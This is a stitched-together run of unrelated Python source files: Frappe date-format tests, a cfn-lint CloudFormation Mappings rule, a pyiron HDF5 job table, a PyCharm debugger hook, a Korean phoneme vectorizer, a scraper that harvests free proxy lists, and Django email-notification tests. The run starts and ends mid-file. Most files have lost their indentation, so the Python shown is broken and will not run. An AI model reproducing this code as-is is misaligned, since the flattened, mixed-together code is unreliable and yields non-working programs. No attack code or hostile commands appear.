frappe.db.set_default("time_format", fmt)
frappe.local.user_time_format = None
self.assertEqual(get_user_time_format(), fmt)
self.assertEqual(format_time(test_time), valid_fmt)
# Test datetime formatters
def test_format_datetime_forced(self):
# Test with forced date formats
self.assertEqual(
format_datetime(test_datetime, "dd-yyyy-MM ss:mm:HH"),
test_date_obj.strftime("%d-%Y-%m %S:%M:%H"),
)
def test_format_datetime(self):
# Test formatdate with various default date formats set
for date_fmt, valid_date in test_date_formats.items():
frappe.db.set_default("date_format", date_fmt)
frappe.local.user_date_format = None
for time_fmt, valid_time in test_time_formats.items():
frappe.db.set_default("time_format", time_fmt)
frappe.local.user_time_format = None
valid_fmt = valid_date + " " + valid_time
self.assertEqual(format_datetime(test_datetime), valid_fmt)
|
"""
Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
SPDX-License-Identifier: MIT-0
"""
import six
from cfnlint.rules import CloudFormationLintRule
from cfnlint.rules import RuleMatch
class Configuration(CloudFormationLintRule):
"""Check if Mappings are configured correctly"""
id = 'E7001'
shortdesc = 'Mappings are appropriately configured'
description = 'Check if Mappings are properly configured'
source_url = 'https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/mappings-section-structure.html'
tags = ['mappings']
def match(self, cfn):
"""Check CloudFormation Parameters"""
matches = []
valid_map_types = (six.string_types, list, six.integer_types, float)
mappings = cfn.template.get('Mappings', {})
if mappings:
for mapname, mapobj in mappings.items():
if not isinstance(mapobj, dict):
message = 'Mapping {0} has invalid property'
matches.append(RuleMatch(
['Mappings', mapname],
message.format(mapname)
))
else:
for firstkey in mapobj:
firstkeyobj = mapobj[firstkey]
if not isinstance(firstkeyobj, dict):
message = 'Mapping {0} has invalid property at {1}'
matches.append(RuleMatch(
['Mappings', mapname, firstkey],
                                message.format(mapname, firstkey)
))
else:
for secondkey in firstkeyobj:
if not isinstance(
firstkeyobj[secondkey], valid_map_types):
message = 'Mapping {0} has invalid property at {1}'
matches.append(RuleMatch(
['Mappings', mapname, firstkey, secondkey],
message.format(mapname, secondkey)
))
return matches
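# A hedged illustration of what this rule accepts and flags (YAML shown in
# comments only; the mapping names are hypothetical):
#
#   Mappings:                 # accepted: the leaf values are scalars
#     RegionMap:
#       us-east-1:
#         AMI: ami-123456
#
#   Mappings:                 # flagged: the second-level value is not a mapping
#     RegionMap:
#       us-east-1: ami-123456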
|
import numpy as np
import os
import pandas
import datetime
import h5io
from pyfileindex import PyFileIndex
from pyiron_base.generic.util import Singleton
from pyiron_base.database.generic import IsDatabase
def filter_function(file_name):
return ".h5" in file_name
class FileTable(IsDatabase, metaclass=Singleton):
def __init__(self, project):
self._fileindex = None
self._job_table = None
self._project = os.path.abspath(project)
self._columns = [
"id",
"status",
"chemicalformula",
"job",
"subjob",
"projectpath",
"project",
"timestart",
"timestop",
"totalcputime",
"computer",
"hamilton",
"hamversion",
"parentid",
"masterid",
"username",
]
self.force_reset()
def _get_view_mode(self):
return False
def force_reset(self):
self._fileindex = PyFileIndex(
path=self._project, filter_function=filter_function
)
df = pandas.DataFrame(self.init_table(fileindex=self._fileindex.dataframe))
if len(df) != 0:
df.id = df.id.astype(int)
self._job_table = df[np.array(self._columns)]
else:
self._job_table = pandas.DataFrame({k: [] for k in self._columns})
def init_table(self, fileindex, working_dir_lst=None):
if working_dir_lst is None:
working_dir_lst = []
fileindex = fileindex[~fileindex.is_directory]
fileindex = fileindex.iloc[fileindex.path.values.argsort()]
job_lst = []
for path, mtime in zip(fileindex.path, fileindex.mtime):
job_dict = self.get_extract(path, mtime)
job_dict["id"] = len(working_dir_lst) + 1
working_dir_lst.append(
job_dict["project"][:-1] + job_dict["subjob"] + "_hdf5/"
)
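            # If this job's project path matches a working directory recorded
            # for an earlier job, it lives inside that job's *_hdf5 folder,
            # so the earlier job is taken as its master.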
if job_dict["project"] in working_dir_lst:
job_dict["masterid"] = working_dir_lst.index(job_dict["project"]) + 1
else:
job_dict["masterid"] = None
job_lst.append(job_dict)
return job_lst
def add_item_dict(self, par_dict):
par_dict = dict((key.lower(), value) for key, value in par_dict.items())
if len(self._job_table) != 0:
job_id = np.max(self._job_table.id.values) + 1
else:
job_id = 1
default_values = {
"id": job_id,
"status": "initialized",
"chemicalformula": None,
"timestart": datetime.datetime.now(),
"computer": None,
"parentid": None,
"username": None,
"timestop": None,
"totalcputime": None,
"masterid": None,
}
for k, v in default_values.items():
if k not in par_dict.keys():
par_dict[k] = v
self._job_table = pandas.concat(
[self._job_table, pandas.DataFrame([par_dict])[self._columns]]
).reset_index(drop=True)
return int(par_dict["id"])
def item_update(self, par_dict, item_id):
if isinstance(item_id, list):
item_id = item_id[0]
if isinstance(item_id, str):
item_id = float(item_id)
for k, v in par_dict.items():
self._job_table.loc[self._job_table.id == int(item_id), k] = v
def delete_item(self, item_id):
item_id = int(item_id)
if item_id in [int(v) for v in self._job_table.id.values]:
self._job_table = self._job_table[
self._job_table.id != item_id
].reset_index(drop=True)
else:
            raise ValueError("Job with id {} does not exist.".format(item_id))
def get_item_by_id(self, item_id):
item_id = int(item_id)
return {
k: list(v.values())[0]
for k, v in self._job_table[self._job_table.id == item_id].to_dict().items()
}
def get_items_dict(self, item_dict, return_all_columns=True):
df = self._job_table
if not isinstance(item_dict, dict):
            raise TypeError("item_dict must be a dictionary")
for k, v in item_dict.items():
if k in ["id", "parentid", "masterid"]:
df = df[df[k] == int(v)]
elif "%" not in str(v):
df = df[df[k] == v]
else:
df = df[df[k].str.contains(v.replace("%", ""))]
df_dict = df.to_dict()
if return_all_columns:
return [{k: v[i] for k, v in df_dict.items()} for i in df_dict["id"].keys()]
else:
return [{"id": i} for i in df_dict["id"].values()]
def update(self):
self._job_table.status = [
self._get_job_status_from_hdf5(job_id)
for job_id in self._job_table.id.values
]
self._fileindex.update()
if len(self._job_table) != 0:
files_lst, working_dir_lst = zip(
*[
[project + subjob[1:] + ".h5", project + subjob[1:] + "_hdf5"]
for project, subjob in zip(
self._job_table.project.values, self._job_table.subjob.values
)
]
)
df_new = self._fileindex.dataframe[
~self._fileindex.dataframe.is_directory
& ~self._fileindex.dataframe.path.isin(files_lst)
]
else:
files_lst, working_dir_lst = [], []
df_new = self._fileindex.dataframe[~self._fileindex.dataframe.is_directory]
if len(df_new) > 0:
job_lst = self.init_table(
fileindex=df_new, working_dir_lst=list(working_dir_lst)
)
df = pandas.DataFrame(job_lst)[self._columns]
if len(files_lst) != 0 and len(working_dir_lst) != 0:
self._job_table = pandas.concat([self._job_table, df]).reset_index(
drop=True
)
else:
self._job_table = df
def _get_table_headings(self, table_name=None):
return self._job_table.columns.values
def _get_job_table(
self,
sql_query,
user,
project_path=None,
recursive=True,
columns=None,
element_lst=None,
):
self.update()
if project_path is None:
project_path = self._project
if len(self._job_table) != 0:
if recursive:
return self._job_table[
self._job_table.project.str.contains(project_path)
]
else:
return self._job_table[self._job_table.project == project_path]
else:
return self._job_table
def get_jobs(self, project=None, recursive=True, columns=None):
if project is None:
project = self._project
if columns is None:
columns = ["id", "project"]
df = self.job_table(
sql_query=None,
user=None,
project_path=project,
recursive=recursive,
columns=columns,
)
if len(df) == 0:
dictionary = {}
for key in columns:
dictionary[key] = list()
return dictionary
# return {key: list() for key in columns}
dictionary = {}
for key in df.keys():
dictionary[key] = df[
key
].tolist() # ToDo: Check difference of tolist and to_list
return dictionary
def get_job_ids(self, project=None, recursive=True):
return self.get_jobs(project=project, recursive=recursive, columns=["id"])["id"]
def get_job_id(self, job_specifier, project=None):
if project is None:
project = self._project
if isinstance(job_specifier, (int, np.integer)):
return job_specifier # is id
        job_specifier = job_specifier.replace(".", "_")
job_id_lst = self._job_table[
(self._job_table.project == project)
& (self._job_table.job == job_specifier)
].id.values
if len(job_id_lst) == 0:
job_id_lst = self._job_table[
self._job_table.project.str.contains(project)
& (self._job_table.job == job_specifier)
].id.values
if len(job_id_lst) == 0:
return None
elif len(job_id_lst) == 1:
return int(job_id_lst[0])
else:
raise ValueError(
"job name '{0}' in this project is not unique".format(job_specifier)
)
def get_child_ids(self, job_specifier, project=None, status=None):
"""
        Get the child jobs for a specific master job
        Args:
            job_specifier (str): name or job ID of the master job
            project (str): project path to search in - defaults to the path of this FileTable
            status (str): only return children whose status matches - None by default
        Returns:
            list: list of child job IDs
"""
if project is None:
project = self._project
id_master = self.get_job_id(project=project, job_specifier=job_specifier)
if id_master is None:
return []
else:
if status is not None:
id_lst = self._job_table[
(self._job_table.masterid == id_master)
& (self._job_table.status == status)
].id.values
else:
id_lst = self._job_table[
(self._job_table.masterid == id_master)
].id.values
return sorted(id_lst)
def get_job_working_directory(self, job_id):
"""
Get the working directory of a particular job
Args:
job_id (int):
Returns:
str: working directory as absolute path
"""
try:
db_entry = self.get_item_by_id(job_id)
if db_entry and len(db_entry) > 0:
job_name = db_entry["subjob"][1:]
return os.path.join(
db_entry["project"],
job_name + "_hdf5",
job_name,
)
else:
return None
except KeyError:
return None
def _get_job_status_from_hdf5(self, job_id):
db_entry = self.get_item_by_id(job_id)
job_name = db_entry["subjob"][1:]
return get_job_status_from_file(
hdf5_file=os.path.join(db_entry["project"], job_name + ".h5"),
job_name=job_name,
)
def get_job_status(self, job_id):
return self._job_table[self._job_table.id == job_id].status.values[0]
def set_job_status(self, job_id, status):
db_entry = self.get_item_by_id(item_id=job_id)
self._job_table.loc[self._job_table.id == job_id, "status"] = status
h5io.write_hdf5(
db_entry["project"] + db_entry["subjob"] + ".h5",
status,
title=db_entry["subjob"][1:] + "/status",
overwrite="update",
)
@staticmethod
def get_extract(path, mtime):
basename = os.path.basename(path)
job = os.path.splitext(basename)[0]
time = datetime.datetime.fromtimestamp(mtime)
return {
"status": get_job_status_from_file(hdf5_file=path, job_name=job),
"chemicalformula": None,
"job": job,
"subjob": "/" + job,
"projectpath": None,
"project": os.path.dirname(path) + "/",
"timestart": time,
"timestop": time,
"totalcputime": 0.0,
"computer": None,
"username": None,
"parentid": None,
"hamilton": get_hamilton_from_file(hdf5_file=path, job_name=job),
"hamversion": get_hamilton_version_from_file(hdf5_file=path, job_name=job),
}
def get_hamilton_from_file(hdf5_file, job_name):
return h5io.read_hdf5(hdf5_file, job_name + "/TYPE").split(".")[-1].split("'")[0]
def get_hamilton_version_from_file(hdf5_file, job_name):
return h5io.read_hdf5(hdf5_file, job_name + "/VERSION")
def get_job_status_from_file(hdf5_file, job_name):
if os.path.exists(hdf5_file):
return h5io.read_hdf5(hdf5_file, job_name + "/status")
else:
return None
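# A minimal usage sketch (illustrative only; the project path is hypothetical):
#
#     table = FileTable(project="/path/to/pyiron/project")
#     table.update()                                  # rescan the .h5 file index
#     print(table.get_job_ids(recursive=True))        # all job ids below project
#     print(table.get_job_working_directory(job_id=1))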
|
import os
if 'DEBUG_SERVER' in os.environ:
# connect to debugger
import pydevd_pycharm
hostname, port = os.environ['DEBUG_SERVER'].split(':')
pydevd_pycharm.settrace(hostname, port=int(port),
stdoutToServer=True, stderrToServer=True)
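# Example invocation (host and port are hypothetical): running
#     DEBUG_SERVER=localhost:5678 python your_script.py
# makes settrace() attach to a PyCharm debug server listening on that port.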
|
import numpy as np
from .LETTERS import kor_phonemes, kor_re, eng_phonemes, eng_re
# Japanese will be handled later
# https://m.blog.naver.com/PostView.nhn?blogId=aoba8615&logNo=140012660052&proxyReferer=https:%2F%2Fwww.google.com%2F
def check_encodings(string):
"""
    Checks the encoding of a string.
    If the string is not unicode, decode and convert it.
    :param string: the string to check
    :return: the string converted to unicode
"""
pass
def syll_lang(syllable):
"""
    Classifies the language of a syllable.
    Currently distinguishes Korean, English and special characters;
    anything other than Korean or English is treated as a special character.
    To be extended later to Japanese and other phonemic and alphabetic scripts.
    :param syllable: input syllable
    :return language: classification result
"""
    kor = any([syllable in v for v in kor_phonemes.values()] +
              [0xac00 - 1 < ord(syllable) < 0xac00 + 11172])
    eng = any(syllable.lower() in v for v in eng_phonemes.values())
if kor:
language = 'kor'
elif eng:
language = 'eng'
else:
language = 'sc'
return language
def syll2vect_kor(syllable):
kor_startpoint = 0xac00
if kor_startpoint - 1 < ord(syllable) < kor_startpoint + 11172:
vector = [kor_phonemes['onset'][(ord(syllable) - kor_startpoint) // (28 * 21)],
kor_phonemes['nucleua'][((ord(syllable) - kor_startpoint) % (28 * 21)) // 28],
kor_phonemes['coda'][(ord(syllable) - kor_startpoint) % 28]]
elif syllable in kor_phonemes['nucleua']:
vector = ['', syllable, '']
else:
vector = [syllable, '', '']
return vector
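# Worked example of the decomposition above (assuming kor_phonemes follows the
# standard Unicode jamo ordering): for '한' (U+D55C),
# ord('한') - 0xAC00 == 10588; 10588 // (28 * 21) == 18 -> onset 'ㅎ';
# (10588 % 588) // 28 == 0 -> nucleus 'ㅏ'; 10588 % 28 == 4 -> coda 'ㄴ'.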
def syll2vect_eng(syllable):
if syllable.lower() in eng_phonemes['consonants']:
vector = [syllable, '', '']
else:
vector = ['', syllable, '']
return vector
def syll2vect_sc(syllable):
vector = ['', '', syllable]
return vector
def syll2vect(syllable):
"""
    Converts a syllable into a vector.
    :param syllable: input syllable
    :return vector: the converted vector
"""
trans_dict = {
'kor': syll2vect_kor,
'eng': syll2vect_eng,
'sc': syll2vect_sc
}
vector = trans_dict[syll_lang(syllable)](syllable)
return vector
def sent2vects(sentence):
"""
    Converts every syllable of a sentence into a vector.
    :param sentence: the sentence to convert
    :return vectors: the sentence converted to vectors
"""
vectors = [syll2vect(syllable) for syllable in sentence]
return np.array(vectors)
def vect_lang(vector):
joined_vect = ''.join(vector)
kor = kor_re.search(joined_vect)
eng = eng_re.search(joined_vect)
if kor:
language = 'kor'
elif eng:
language = 'eng'
else:
language = 'sc'
return language
def vect2syll_kor(vector):
syllable = ''.join(vector)
if len(syllable) > 1:
# onset, nucleua, coda = (kor_phonemes[element].index(vector[i]) for i, element in enumerate(kor_phonemes.keys()))
onset = kor_phonemes['onset'].index(vector[0])
nucleua = kor_phonemes['nucleua'].index(vector[1])
coda = kor_phonemes['coda'].index(vector[2])
syllable = chr(((onset * 21) + nucleua) * 28 + coda + 0xac00)
return syllable
def vect2syll_etc(vector):
syllable = ''.join(vector)
return syllable
def vect2syll(vector):
trans_dict = {
'kor': vect2syll_kor,
'eng': vect2syll_etc,
'sc': vect2syll_etc
}
syllable = trans_dict[vect_lang(vector)](vector)
return syllable
def vects2sent(vectors):
sentence = ''.join([vect2syll(vector) for vector in vectors])
return sentence
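# Round-trip sketch (assumes the LETTERS tables and regexes cover these
# characters):
#
#     vects = sent2vects("한글 abc")
#     assert vects2sent(vects) == "한글 abc"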
|
# -*- coding: utf-8 -*-
"""
-------------------------------------------------
File Name: proxyFetcher
Description :
Author : JHao
date: 2016/11/25
-------------------------------------------------
Change Activity:
2016/11/25: proxyFetcher
-------------------------------------------------
"""
__author__ = 'JHao'
import re
from time import sleep
from setting import PROXIES
from util.webRequest import WebRequest
class ProxyFetcher(object):
"""
proxy getter
"""
@staticmethod
def freeProxy01():
"""
        Mimvp proxy (米扑代理) https://proxy.mimvp.com/
:return:
"""
url_list = [
'https://proxy.mimvp.com/freeopen?proxy=in_hp',
'https://proxy.mimvp.com/freeopen?proxy=out_hp'
]
port_img_map = {'DMxMjg': '3128', 'Dgw': '80', 'DgwODA': '8080',
'DgwOA': '808', 'DgwMDA': '8000', 'Dg4ODg': '8888',
'DgwODE': '8081', 'Dk5OTk': '9999'}
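        # The site renders ports as images; the img src carries an encoded
        # token. Dropping the first 14 characters and the 'O0O' filler leaves
        # a key from port_img_map above, e.g. 'DMxMjg' -> port '3128'.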
for url in url_list:
html_tree = WebRequest().get(url).tree
for tr in html_tree.xpath(".//table[@class='mimvp-tbl free-proxylist-tbl']/tbody/tr"):
try:
ip = ''.join(tr.xpath('./td[2]/text()'))
port_img = ''.join(tr.xpath('./td[3]/img/@src')).split("port=")[-1]
port = port_img_map.get(port_img[14:].replace('O0O', ''))
if port:
yield '%s:%s' % (ip, port)
except Exception as e:
print(e)
@staticmethod
def freeProxy02():
"""
        Proxy66 (代理66) http://www.66ip.cn/
:return:
"""
url = "http://www.66ip.cn/mo.php"
resp = WebRequest().get(url, timeout=10)
proxies = re.findall(r'(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}:\d{1,5})', resp.text)
for proxy in proxies:
yield proxy
@staticmethod
def freeProxy03():
""" 开心代理 """
target_urls = ["http://www.kxdaili.com/dailiip.html", "http://www.kxdaili.com/dailiip/2/1.html"]
for url in target_urls:
tree = WebRequest().get(url).tree
for tr in tree.xpath("//table[@class='active']//tr")[1:]:
ip = "".join(tr.xpath('./td[1]/text()')).strip()
port = "".join(tr.xpath('./td[2]/text()')).strip()
yield "%s:%s" % (ip, port)
@staticmethod
def freeProxy04():
""" 蝶鸟IP """
url = "https://www.dieniao.com/FreeProxy.html"
tree = WebRequest().get(url, verify=False).tree
for li in tree.xpath("//div[@class='free-main col-lg-12 col-md-12 col-sm-12 col-xs-12']/ul/li")[1:]:
ip = "".join(li.xpath('./span[1]/text()')).strip()
port = "".join(li.xpath('./span[2]/text()')).strip()
yield "%s:%s" % (ip, port)
@staticmethod
def freeProxy05(page_count=1):
""" 快代理 https://www.kuaidaili.com """
url_pattern = [
'https://www.kuaidaili.com/free/inha/{}/',
'https://www.kuaidaili.com/free/intr/{}/'
]
url_list = []
for page_index in range(1, page_count + 1):
for pattern in url_pattern:
url_list.append(pattern.format(page_index))
for url in url_list:
tree = WebRequest().get(url).tree
proxy_list = tree.xpath('.//table//tr')
            sleep(1)  # must sleep here, otherwise the second request gets no data
for tr in proxy_list[1:]:
yield ':'.join(tr.xpath('./td/text()')[0:2])
@staticmethod
def freeProxy06():
""" PROXY11 https://proxy11.com """
url = "https://proxy11.com/api/demoweb/proxy.json?country=hk&speed=2000"
try:
resp_json = WebRequest().get(url).json
for each in resp_json.get("data", []):
yield "%s:%s" % (each.get("ip", ""), each.get("port", ""))
except Exception as e:
print(e)
@staticmethod
def freeProxy07():
""" 云代理 """
urls = ['http://www.ip3366.net/free/?stype=1', "http://www.ip3366.net/free/?stype=2"]
for url in urls:
r = WebRequest().get(url, timeout=10)
proxies = re.findall(r'<td>(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})</td>[\s\S]*?<td>(\d+)</td>', r.text)
for proxy in proxies:
yield ":".join(proxy)
@staticmethod
def freeProxy08():
""" 小幻代理 """
urls = ['https://ip.ihuan.me/address/5Lit5Zu9.html']
for url in urls:
r = WebRequest().get(url, timeout=10)
proxies = re.findall(r'>\s*?(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\s*?</a></td><td>(\d+)</td>', r.text)
for proxy in proxies:
yield ":".join(proxy)
@staticmethod
def freeProxy09(page_count=1):
""" 免费代理库 """
for i in range(1, page_count + 1):
url = 'http://ip.jiangxianli.com/?country=中国&page={}'.format(i)
html_tree = WebRequest().get(url).tree
for index, tr in enumerate(html_tree.xpath("//table//tr")):
if index == 0:
continue
yield ":".join(tr.xpath("./td/text()")[0:2]).strip()
@staticmethod
def freeProxy10():
""" 89免费代理 """
r = WebRequest().get("https://www.89ip.cn/index_1.html", timeout=10)
proxies = re.findall(
r'<td.*?>[\s\S]*?(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})[\s\S]*?</td>[\s\S]*?<td.*?>[\s\S]*?(\d+)[\s\S]*?</td>',
r.text)
for proxy in proxies:
yield ':'.join(proxy)
# @staticmethod
# def wallProxy01():
# """
# PzzQz https://pzzqz.com/
# """
# from requests import Session
# from lxml import etree
# session = Session()
# try:
# index_resp = session.get("https://pzzqz.com/", timeout=20, verify=False).text
# x_csrf_token = re.findall('X-CSRFToken": "(.*?)"', index_resp)
# if x_csrf_token:
# data = {"http": "on", "ping": "3000", "country": "cn", "ports": ""}
# proxy_resp = session.post("https://pzzqz.com/", verify=False,
# headers={"X-CSRFToken": x_csrf_token[0]}, json=data).json()
# tree = etree.HTML(proxy_resp["proxy_html"])
# for tr in tree.xpath("//tr"):
# ip = "".join(tr.xpath("./td[1]/text()"))
# port = "".join(tr.xpath("./td[2]/text()"))
# yield "%s:%s" % (ip, port)
# except Exception as e:
# print(e)
# @staticmethod
# def freeProxy10():
# """
    # cn-proxy - a site hosted outside the Great Firewall (墙外网站)
# :return:
# """
# urls = ['http://cn-proxy.com/', 'http://cn-proxy.com/archives/218']
# request = WebRequest()
# for url in urls:
# r = request.get(url, timeout=10)
# proxies = re.findall(r'<td>(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})</td>[\w\W]<td>(\d+)</td>', r.text)
# for proxy in proxies:
# yield ':'.join(proxy)
# @staticmethod
# def freeProxy11():
# """
# https://proxy-list.org/english/index.php
# :return:
# """
# urls = ['https://proxy-list.org/english/index.php?p=%s' % n for n in range(1, 10)]
# request = WebRequest()
# import base64
# for url in urls:
# r = request.get(url, timeout=10)
# proxies = re.findall(r"Proxy\('(.*?)'\)", r.text)
# for proxy in proxies:
# yield base64.b64decode(proxy).decode()
# @staticmethod
# def freeProxy12():
# urls = ['https://list.proxylistplus.com/Fresh-HTTP-Proxy-List-1']
# request = WebRequest()
# for url in urls:
# r = request.get(url, timeout=10)
# proxies = re.findall(r'<td>(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})</td>[\s\S]*?<td>(\d+)</td>', r.text)
# for proxy in proxies:
# yield ':'.join(proxy)
@staticmethod
def proxyDBNet():
urls = [
'http://proxydb.net/?protocol=https&anonlvl=4&min_uptime=75&max_response_time=5&country=CN',
'http://proxydb.net/?protocol=https&anonlvl=4&min_uptime=75&max_response_time=5&country=',
'http://proxydb.net/?protocol=https&anonlvl=4&min_uptime=75&max_response_time=5&country=SG',
'http://proxydb.net/?protocol=https&anonlvl=4&min_uptime=75&max_response_time=5&country=US',
'http://proxydb.net/?protocol=https&anonlvl=4&min_uptime=75&max_response_time=5&country=CZ',
'http://proxydb.net/?protocol=https&anonlvl=4&min_uptime=75&max_response_time=5&country=AR',
]
request = WebRequest()
for url in urls:
r = request.get(url, timeout=20)
proxies = re.findall(r'(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}:\d+)', r.text)
for proxy in proxies:
yield proxy
@staticmethod
def zdayeCom():
urls = 'https://www.zdaye.com/dayProxy.html'
request = WebRequest()
detail_url = 'https://www.zdaye.com' + request.get(urls, timeout=10).tree.xpath('//h3[@class="thread_title"]//a/@href')[0]
proxy_list = request.get(detail_url, timeout=10).tree.xpath('//a[contains(@href,"/ip/CheckHttp/")]/@href')
for url in proxy_list:
proxy = re.findall(r'(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}:\d+)',url)
if proxy:
yield proxy[0]
# @staticmethod
# def freeproxyCz():
# url = "https://spys.one/free-proxy-list/CN/"
# request = WebRequest()
# r = request.get(url, timeout=10, proxies=PROXIES)
# print( r.text)
# proxies = re.findall(r"document\.write\(Base64\.decode\(\"(.*?)\"\).*?\"fport\".*?>(.*?)<", r.text)
# for proxy in proxies:
# yield proxy
# # yield base64.b64decode(proxy).decode()
@staticmethod
def proxynovaCom():
url = "https://www.proxynova.com/proxy-server-list/country-cn"
request = WebRequest()
r = request.get(url, timeout=10, proxies=PROXIES)
proxies = re.findall(r"document\.write\(\"(.*?)\"\).*?\".*?>(\d+)</", r.text.replace("\n", "").replace(" ", ""))
for proxy in proxies:
yield re.sub(r'[\"\+]', '', proxy[0]) + ":" + proxy[1]
"""
# The following sites require access from outside the Great Firewall (需要翻墙):
# http://free-proxy.cz/zh/
# https://free-proxy-list.net/anonymous-proxy.html
# http://free-proxy.cz/en/proxylist/country/CN/all/ping/all
# https://spys.one/free-proxy-list/CN/
"""
if __name__ == '__main__':
p = ProxyFetcher()
for _ in p.proxynovaCom():
print(_)
|
from datetime import datetime
import json
from django.conf import settings
from django.core import mail
from django.core.mail import EmailMultiAlternatives
from django.core.management import call_command
from django.test import TestCase, SimpleTestCase
from django.test.utils import override_settings
from django_dynamic_fixture import G
from entity.models import Entity, EntityRelationship, EntityKind
from entity_event.models import (
Medium, Source, Subscription, Unsubscription, Event, EventActor
)
from freezegun import freeze_time
from mock import patch
from entity_emailer.interface import EntityEmailerInterface
from entity_emailer.models import Email
from entity_emailer.tests.utils import g_email
from entity_emailer.utils import extract_email_subject_from_html_content, create_email_message, \
get_subscribed_email_addresses, get_from_email_address
class ExtractEmailSubjectFromHtmlContentTest(SimpleTestCase):
def test_blank(self):
subject = extract_email_subject_from_html_content('')
self.assertEquals(subject, '')
def test_with_title_block(self):
subject = extract_email_subject_from_html_content('<html><head><title> Hello! </title></head></html>')
self.assertEquals(subject, 'Hello!')
def test_wo_title_block_under_40_chars_content(self):
subject = extract_email_subject_from_html_content(' Small content ')
self.assertEquals(subject, 'Small content')
def test_wo_title_block_under_40_chars_multiline_content(self):
subject = extract_email_subject_from_html_content((
' Small content \n'
'that spans multiple lines'
))
self.assertEquals(subject, 'Small content')
def test_wo_title_block_gt_40_chars_content(self):
subject = extract_email_subject_from_html_content((
' This is reallly long content that is greater than 40 chars on the first line. It should have ...'
))
self.assertEquals(subject, 'This is reallly long content that is gre...')
class ConvertEventsToEmailsTest(TestCase):
def setUp(self):
call_command('add_email_medium')
self.email_medium = Medium.objects.get(name='email')
def test_no_events(self):
EntityEmailerInterface.convert_events_to_emails()
self.assertFalse(Email.objects.exists())
def test_no_subscriptions(self):
G(Event, context={})
EntityEmailerInterface.convert_events_to_emails()
self.assertFalse(Email.objects.exists())
def test_default_from_email(self):
# settings.DEFAULT_FROM_EMAIL is already set to test@example.com
source = G(Source)
e = G(Entity)
G(Subscription, entity=e, source=source, medium=self.email_medium, only_following=False, sub_entity_kind=None)
email_context = {
'entity_emailer_template': 'template',
'entity_emailer_subject': 'hi',
}
event = G(Event, source=source, context=email_context)
G(EventActor, event=event, entity=e)
EntityEmailerInterface.convert_events_to_emails()
email = Email.objects.get()
self.assertEqual(email.from_address, 'test@example.com')
def test_custom_from_email(self):
source = G(Source)
e = G(Entity)
G(Subscription, entity=e, source=source, medium=self.email_medium, only_following=False, sub_entity_kind=None)
email_context = {
'entity_emailer_template': 'template',
'entity_emailer_subject': 'hi',
'from_address': 'custom@example.com'
}
event = G(Event, source=source, context=email_context)
G(EventActor, event=event, entity=e)
EntityEmailerInterface.convert_events_to_emails()
email = Email.objects.get()
self.assertEqual(email.from_address, 'custom@example.com')
@freeze_time('2013-1-2')
def test_basic_only_following_false_subscription(self):
source = G(Source)
e = G(Entity)
G(Subscription, entity=e, source=source, medium=self.email_medium, only_following=False, sub_entity_kind=None)
email_context = {
'entity_emailer_template': 'template',
'entity_emailer_subject': 'hi',
}
event = G(Event, source=source, context=email_context)
G(EventActor, event=event, entity=e)
EntityEmailerInterface.convert_events_to_emails()
email = Email.objects.get()
self.assertEquals(list(email.recipients.all()), [e])
self.assertEquals(email.event.context, email_context)
self.assertEquals(email.subject, '')
self.assertEquals(email.scheduled, datetime(2013, 1, 2))
@freeze_time('2013-1-2')
def test_basic_only_following_false_subscription_marked_seen(self):
source = G(Source)
e = G(Entity)
G(Subscription, entity=e, source=source, medium=self.email_medium, only_following=False, sub_entity_kind=None)
email_context = {
'entity_emailer_template': 'template',
'entity_emailer_subject': 'hi',
}
event = G(Event, source=source, context=email_context)
G(EventActor, event=event, entity=e)
EntityEmailerInterface.convert_events_to_emails()
EntityEmailerInterface.convert_events_to_emails()
email = Email.objects.get()
self.assertEquals(list(email.recipients.all()), [e])
self.assertEquals(email.event.context, email_context)
self.assertEquals(email.subject, '')
self.assertEquals(email.scheduled, datetime(2013, 1, 2))
@freeze_time('2013-1-2')
def test_basic_only_following_true_subscription(self):
source = G(Source)
e = G(Entity)
se = G(Entity)
G(EntityRelationship, sub_entity=e, super_entity=se)
other_e = G(Entity)
G(Subscription, entity=e, source=source, medium=self.email_medium, only_following=True)
G(Subscription, entity=other_e, source=source, medium=self.email_medium, only_following=True)
email_context = {
'entity_emailer_template': 'template',
'entity_emailer_subject': 'hi',
}
event = G(Event, source=source, context=email_context)
G(EventActor, event=event, entity=se)
EntityEmailerInterface.convert_events_to_emails()
email = Email.objects.get()
# Since the other_e entity does not follow the se entity, only the e entity receives an email
self.assertEquals(set(email.recipients.all()), set([e]))
self.assertEquals(email.event.context, email_context)
self.assertEquals(email.subject, '')
self.assertEquals(email.scheduled, datetime(2013, 1, 2))
@freeze_time('2013-1-2')
def test_super_entity_only_following_false_subscription(self):
source = G(Source)
e = G(Entity)
se = G(Entity)
G(EntityRelationship, sub_entity=e, super_entity=se)
other_e = G(Entity)
G(Subscription, entity=e, source=source, medium=self.email_medium, only_following=False)
G(Subscription, entity=other_e, source=source, medium=self.email_medium, only_following=False)
email_context = {
'entity_emailer_template': 'template',
'entity_emailer_subject': 'hi',
}
event = G(Event, source=source, context=email_context)
G(EventActor, event=event, entity=se)
G(EventActor, event=event, entity=other_e)
G(EventActor, event=event, entity=e)
EntityEmailerInterface.convert_events_to_emails()
email = Email.objects.get()
self.assertEquals(set(email.recipients.all()), set([e, other_e]))
self.assertEquals(email.event.context, email_context)
self.assertEquals(email.subject, '')
self.assertEquals(email.scheduled, datetime(2013, 1, 2))
@freeze_time('2013-1-2')
def test_basic_only_following_true_group_subscription(self):
source = G(Source)
ek = G(EntityKind)
e = G(Entity, entity_kind=ek)
se = G(Entity)
G(EntityRelationship, sub_entity=e, super_entity=se)
other_e = G(Entity, entity_kind=ek)
G(EntityRelationship, sub_entity=other_e, super_entity=se)
G(Subscription, entity=se, sub_entity_kind=ek, source=source, medium=self.email_medium, only_following=True)
email_context = {
'entity_emailer_template': 'template',
'entity_emailer_subject': 'hi',
}
event = G(Event, source=source, context=email_context)
G(EventActor, event=event, entity=se)
EntityEmailerInterface.convert_events_to_emails()
email = Email.objects.get()
